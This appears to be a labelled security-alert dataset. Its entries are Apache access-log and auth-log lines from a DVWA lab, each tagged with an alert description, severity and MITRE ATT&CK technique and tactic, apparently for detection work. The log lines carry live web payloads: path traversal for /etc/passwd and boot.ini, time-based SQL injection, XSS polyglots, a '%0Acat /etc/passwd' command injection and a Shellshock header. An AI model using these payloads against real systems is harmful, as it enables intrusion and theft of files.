source
stringclasses
7 values
full_log
stringlengths
39
5.15k
description
stringclasses
59 values
level
int64
3
15
technique
stringclasses
37 values
tactic
stringclasses
23 values
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:06 +0500] "GET /yappa-ng/index.php?album=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:57 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5c%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:26 +0500] "GET /DVWA/vulnerabilities/xss_r/?name='%2bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%2f%2a&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:28:16 +0500] "GET /DVWA/login.php?Login=%0Acat%20/etc/passwd&password=E04GH4Og&user_token=8b200124ecd990a2056241cb3415035a&username=871836 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:41 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%%35%%63etc%%35%%63passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:49 +0500] "GET /index.php?module=Topics&func=view&topicid=-1%20UNION%20SELECT%20null%2cnull%2c'mdpro_topicid_sql_injection.nasl-1697826347'%2cnull%2cnull%2cnull%2cnull%20-- HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:27:52 +0500] "GET /DVWA/login.php?Login=Login&password=../../../../../../../../../boot.ini%00.txt&user_token=8b200124ecd990a2056241cb3415035a&username=944607 HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%uEFC8%2e%2e%2e%2f%2e%uEFC8boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:09 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%5c%5c%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:36 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/locales.template.DqFain' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:37 +0500] "GET /DVWA/index.php?route=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 522 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:44 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%af%2e%2e%e0%80%afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fvar%2flog%2fnginx%2faccess_log&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:50:39 sohaib-virtual-machine sudo: sohaib : TTY=pts/3 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "14dj7ucm"; ls \'/opt/atlassian/jira/bin/jira-configurator.jar\' 2> /dev/null; printf "command_done_%s" "3PGPD_BM"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/auth.log
Oct 18 23:51:08 sohaib-virtual-machine sudo: sohaib : TTY=pts/2 ; PWD=/home/sohaib ; USER=root ; COMMAND=/usr/bin/sh -c 'printf "command_start_%s" "N_iLSJ7l"; if test ! -L "/usr/share/apport/apport.jar"; then unzip -Z1 "/usr/share/apport/apport.jar" 2> /dev/null; fi; printf "command_done_%s" "hZWOxKWS"'
Successful sudo to ROOT executed.
3
["T1548.003"]
["TA0004","TA0005"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log.1
Dec 23 12:04:02 ubuntu sshd[2297]: Accepted password for arsalan from 192.168.217.1 port 64190 ssh2
sshd: authentication success.
3
["T1078","T1021"]
["TA0005","TA0003","TA0004","TA0001","TA0008"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:05 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2f%2e%2e%2f%2e%2e%2f%2f%2e%2e%2f%2f%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:53 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cinput%20name%3d%22username%22%20value%3d%22admin%22%20%2f%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:05 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:47 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2fVolumes%2fMacintosh_HD1%2fopt%2fapache2%2fconf%2fhttpd%2econf%00&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:31 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%5c%2e%2e%2e%5c%2e%2e%2e%5c%2e%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:54 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini%00index%2ehtml&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:17 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%af%2e%2e%01%f8%80%80%80%afetc%f8%80%80%80%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:07 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=jaVasCript%3a%2f%2a-%2f%2a%60%2f%2a%5c%60%2f%2a'%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dalert()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f--!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dalert()%2f%2f%3e%5cx3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:41 +0500] "GET /file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/etc/cups/subscriptions.conf' modified Mode: scheduled Changed attributes: size,inode,mtime,md5,sha1,sha256 Size changed from '1267' to '676' Old modification time was: '1704552666', now it is '1704602984' Old inode was: '132329', now it is '132946' Old md5sum was: '53705dba6a7c7708307cd85472de72cf' New md5sum is : '1da2650bb50c3a7c21ab7bcaa85d36ec' Old sha1sum was: '65e342bc4a36f64c860aca95dc94156a47af04a7' New sha1sum is : 'a007672ed1f34226f1b184758a8c649164d0927c' Old sha256sum was: '120510fdea49eda291fea548040b73d89b3a09ca9fe8bf695f3f08311825d5c3' New sha256sum is : 'bc776b91100e1e10557dc9cf0b87cd827294793b8c3bf62de9752b7fe1516db0'
Integrity checksum changed.
7
["T1565.001"]
["TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts%3bindex%2ehtm&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b011/indexbyte_amd64.o' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5c%5cwindows%5c%5c%5csystem32%5c%5c%5cdrivers%5c%5c%5cetc%5c%5c%5chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:01 +0500] "GET /cgi-bin/mt/mt-load.cgi HTTP/1.1" 404 494 "-" "() { ignored; }; /bin/sleep 5;"
Shellshock attack attempt
6
["T1068","T1190"]
["TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:44 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:27 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%c0%2f%5C%2e%2e%c0%2f%5C%2e%2e%c0%2f%5C%2e%2e%c0%2f%5C%2e%2e%c0%2f%5C%2e%2e%c0%2fetc%c0%2fissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cimage%20filter%3d'%2e%2e%2e'%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5c%5c%2e%2e%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 306 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:05 +0500] "GET /cgi-bin//atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://example.com/ HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:46:08 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:10 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e0x5c%2e%00%2e0x5c%2e%00%2e0x5c%2e%00%2e0x5cetc0x5cissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:46 +0500] "GET /scripts/welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%25c0%25afetc%25c0%25afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
